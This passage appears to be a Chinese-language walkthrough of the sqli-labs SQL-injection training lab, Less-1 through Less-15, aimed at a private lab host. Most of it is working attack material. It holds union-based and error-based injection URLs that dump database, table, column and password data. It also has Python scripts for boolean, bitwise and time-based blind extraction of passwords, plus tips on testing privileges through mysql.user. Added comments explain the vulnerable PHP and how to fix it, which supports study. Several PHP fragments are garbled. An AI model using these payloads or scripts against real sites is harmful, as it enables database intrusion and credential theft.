http://192.168.3.7/sqli/Less-1/?id=1' order by 4 --+
判断显示位。可以得到显示位为2,3
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,2,3--+
得到数据库名security
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,database(),3--+
得到表名emails,referers,uagents,users
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,(selectgroup_concat(table_name) from information_schema.tables where table_schema=database()),3--+
得到列名id,username,password
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,(selectgroup_concat(column_name) from information_schema.columns where table_name='users'),3--+
得到数据
http://192.168.3.7/sqli/Less-1/?id=-1' union select1,(selectgroup_concat(username,0x23,password) fromusers),3--+
Less-2
整型注入（id 参数以数字形式直接拼入 SQL，没有引号包裹）
<?php
// sqli-labs Less-2 (numeric context). The request parameter $id (the "id"
// query-string value in the URLs above) is interpolated verbatim into the
// statement text: no quoting, no cast, no bound parameter. Anything the
// caller appends to the number therefore becomes part of the SQL. The
// defensive fix is a prepared statement with the id bound as a parameter
// (or, as a minimum, an (int) cast before use) instead of string building.
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result = mysql_query($sql);        // executes the concatenated statement; false on error
$row = mysql_fetch_array($result);  // first matching row, or false when there is none / on error
?>
answer:
http://192.168.3.7/sqli/Less-2/?id=1 --+
Less-3
单引号和括号注入
<?php
// sqli-labs Less-3 (quoted + parenthesised context). The value is wrapped in
// ('...') but $id is still pasted into the statement text unescaped, so the
// quoting changes only the syntax a caller must match, not whether the query
// can be altered. As in Less-2 the remedy is a bound parameter, not
// concatenation; the surrounding quotes/parentheses are not a control.
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result = mysql_query($sql);        // executes the concatenated statement; false on error
$row = mysql_fetch_array($result);  // first matching row, or false when there is none / on error
?>
def binary():
    """Boolean-based blind probe for sqli-labs Less-5 (lab host 192.168.3.7).

    For each of 8 rows and up to 39 character positions it bisects the
    printable ASCII range 0x20..0x7f, one GET request per step, using the
    substring 'You are in' in the response body as the true/false oracle.
    The recovered prefix is printed after every resolved character; the
    function returns nothing.

    From a defender's view the oracle is the point to remove: the page
    answers differently depending on the truth of an injected predicate
    because the id value is concatenated into the query. A bound parameter
    closes the injection, and a response that does not vary with query
    truth (plus alerting on long runs of near-identical requests that only
    differ in a numeric comparison) removes the side channel.
    """
    url = "http://192.168.3.7/sqli/Less-5/?id=1"
    #payload="1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))<{} --+"
    #payload = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit {},1),{},1))<{} --+"
    payload = "1' and ascii(substr((select password from users limit {},1),{},1))<{} --+"
    for i in range(8):
        info = ""  # characters recovered so far for row i
        for j in range(1, 40):
            # invariant during the search: left <= code point < right
            left = 0x20
            right = 0x7f
            while 1:
                mid = left + (right - left) // 2
                if mid == left:
                    # interval has shrunk to one value: that is the character
                    #print(mid)
                    info = info + chr(mid)
                    print(info)
                    break
                tmppayload = payload.format(i, j, mid)
                tmpurl = url + tmppayload
                res = requests.get(tmpurl)
                # predicate "ascii(...) < mid" was true -> value lies below mid
                if 'You are in' in res.text:
                    right = mid
                else:
                    left = mid
} } else { echo"Please input the ID as parameter with numeric value";}
?>
answer:
得到数据库名
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectdatabase()),':',floor(rand()*2))as a from information_schema.tables groupby a --+
得到表名
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectgroup_concat(table_name) from information_schema.tables where table_schema=database()),':',floor(rand()*2))as a from information_schema.tables groupby a --+
得到列名
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectgroup_concat(column_name) from information_schema.columns where table_name='users'),':',floor(rand()*2))as a from information_schema.tables groupby a --+
得到数据
http://192.168.3.7/sqli/Less-6/?id=1" union selectcount(*),2,concat(':',(selectconcat(username,0x23,password) fromuserslimit0,1),':',floor(rand()*2))as a from information_schema.tables groupby a --+
<?php $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
if($row) { echo'<font color= "#FFFF00">'; echo'You are in.... Use outfile......'; echo"<br>"; echo"</font>"; } else { echo'<font color= "#FFFF00">'; echo'You have an error in your SQL syntax'; //print_r(mysql_error()); echo"</font>"; } } else { echo"Please input the ID as parameter with numeric value";}
?>
tips 数据库用户权限判断
and (select count(*) from mysql.user)>0 --+ 如果页面返回正常，说明当前数据库账户能够读取 mysql.user 表，权限较高（通常具备读写权限）。 and (select count(*) from mysql.user)>0 --+ 如果返回错误，说明当前数据库账户权限较低。
secure_file_priv 这个参数用来限制数据导入和导出操作，例如 LOAD DATA、SELECT … INTO OUTFILE 语句和 LOAD_FILE() 函数。这些操作还要求数据库用户具有 FILE 权限。
<?php $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
if($row) { echo'<font size="5" color="#FFFF00">'; echo'You are in...........'; echo"<br>"; echo"</font>"; } else { echo'<font size="5" color="#FFFF00">'; //echo 'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo"</br></font>"; echo'<font color= "#0000ff" font size= 3>'; } } else { echo"Please input the ID as parameter with numeric value";}
import requests

def and_operation():
    """Bitwise blind probe for sqli-labs Less-8 (lab host 192.168.3.7).

    Instead of bisecting, each character is rebuilt one bit at a time: for
    bits 0..6 the payload ANDs the character's ASCII value with 2**k and the
    presence of 'You are in' in the response reports whether that bit is
    set. A character that resolves to 0 ends the row. Eight rows, at most 39
    characters each; the prefix is printed after each character; returns
    nothing.

    Defensive note: the only signal used is the page body differing with the
    truth of an injected expression, which exists because the id value is
    concatenated into the SQL. Binding the parameter removes the injection;
    a truth-independent response removes the oracle.
    """
    url = "http://192.168.3.7/sqli/Less-8/?id=1"
    # The & operator has to be URL-encoded (%26): in a GET request a literal
    # '&' would be read as the query-string parameter separator.
    #payload = "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))%26{} --+"
    #payload = "' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit {},1),{},1))%26{} --+"
    payload = "' and ascii(substr((select concat(username,0x23,password )from users limit {},1),{},1))%26{} -- +"
    for i in range(8):
        info = ""  # characters recovered so far for row i
        for j in range(1, 40):
            value = 0  # ASCII code assembled from the individual bit tests
            for k in range(7):
                tmppayload = payload.format(i, j, 2**k)
                tmpurl = url + tmppayload
                res = requests.get(tmpurl)
                if 'You are in' in res.text:
                    value = value + (2**k)
            if value == 0:
                # no bit set: past the end of this row's value
                break
            info = info + chr(value)
            print(info)
echo'<font size="5" color="#FFFF00">'; echo'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo"</br></font>"; echo'<font color= "#0000ff" font size= 3>';
} } else { echo"Please input the ID as parameter with numeric value";}
import requests
import time

def binary():
    """Time-based blind probe for sqli-labs Less-9 (lab host 192.168.3.7).

    Same bisection over 0x20..0x7f as the boolean variant, but the oracle is
    elapsed time: the payload wraps the comparison in if(..., sleep(2), 1),
    and a request that takes >= 2 s is read as "true". A character that
    resolves to 0x20 is treated as the end of the row. Eight rows, at most
    39 characters each; the prefix is printed after each character; returns
    nothing. The response body (res) is fetched but not inspected.

    Defensive note: here the page looks identical either way, so hiding
    errors did not remove the channel; only a bound parameter does. Slow
    requests clustered on one endpoint with a numeric comparison in the
    parameter are the observable pattern on the server side.
    """
    url = "http://192.168.3.7/sqli/Less-9/?id=1"
    #payload="' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))<{} --+"
    #payload = "' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit {},1),{},1))<{} --+"
    payload = "' and if(ascii(substr((select password from users limit {},1),{},1))<{},sleep(2),1) --+"
    for i in range(8):
        info = ""  # characters recovered so far for row i
        flag = 0  # set once the terminator (0x20) is hit, i.e. end of this value
        for j in range(1, 40):
            if flag == 1:
                break
            # invariant during the search: left <= code point < right
            left = 0x20
            right = 0x7f
            while 1:
                mid = left + (right - left) // 2
                if mid == left:
                    #print(mid)
                    if mid == 0x20:
                        # lowest value of the range: no more characters in this row
                        flag = 1
                        break
                    info = info + chr(mid)
                    print(info)
                    break
                tmppayload = payload.format(i, j, mid)
                tmpurl = url + tmppayload
                startTime = time.time()
                res = requests.get(tmpurl)
                endTime = time.time()
                spendTime = endTime - startTime
                # a delay of at least the sleep() length means the comparison was true
                if spendTime >= 2:
                    right = mid
                else:
                    left = mid
import requests
import time

def binary():
    """Time-based blind probe for sqli-labs Less-15 (lab host 192.168.3.7).

    Same bisection over 0x1f..0x7f as the Less-9 script, but the payload is
    sent as the 'uname' field of a POST login form, the comparison is
    wrapped in CASE WHEN ... THEN sleep(3), and a request taking >= 3 s is
    read as "true". Ten rows, up to 40 characters each; the prefix is
    printed after each character; returns nothing.

    Note that `flag` is assigned when the terminator 0x1f is reached but is
    never read by the `for j` loop, so unlike the Less-9 script the loop
    does not stop at the end of a value; it keeps issuing requests for the
    remaining positions.

    Defensive note: the login handler builds its query from the submitted
    username; a bound parameter closes the injection regardless of what the
    page displays. Repeated slow POSTs to the login endpoint from one client
    are the server-side signature.
    """
    url = "http://192.168.3.7/sqli/Less-15/"
    payload = "admin' and case when (ascii(substr((select concat(table_name) from information_schema.tables where table_schema=database() limit {} ,1),{},1))<{}) then sleep(3) else 1 end -- +"
    for i in range(10):
        info = ""  # characters recovered so far for row i
        for j in range(0, 40):
            flag = 0  # written below on reaching 0x1f, but not read anywhere
            # invariant during the search: left <= code point < right
            left = 0x1f
            right = 0x7f
            while 1:
                mid = left + (right - left) // 2
                if mid == left:
                    if mid == 0x1f:
                        # lowest value of the range: treated as end of the value
                        flag = 1
                        break
                    info = info + chr(mid)
                    print(info)
                    break
                data = {
                    'uname': payload.format(i, j, mid),
                    'passwd': "ye1s",
                    'submit': 'Submit'
                }
                # print(payload.format(i,j,mid))
                startTime = time.time()
                requests.post(url=url, data=data)
                endTime = time.time()
                spendTime = endTime - startTime
                # a delay of at least the sleep() length means the comparison was true
                if spendTime >= 3:
                    right = mid
                else:
                    left = mid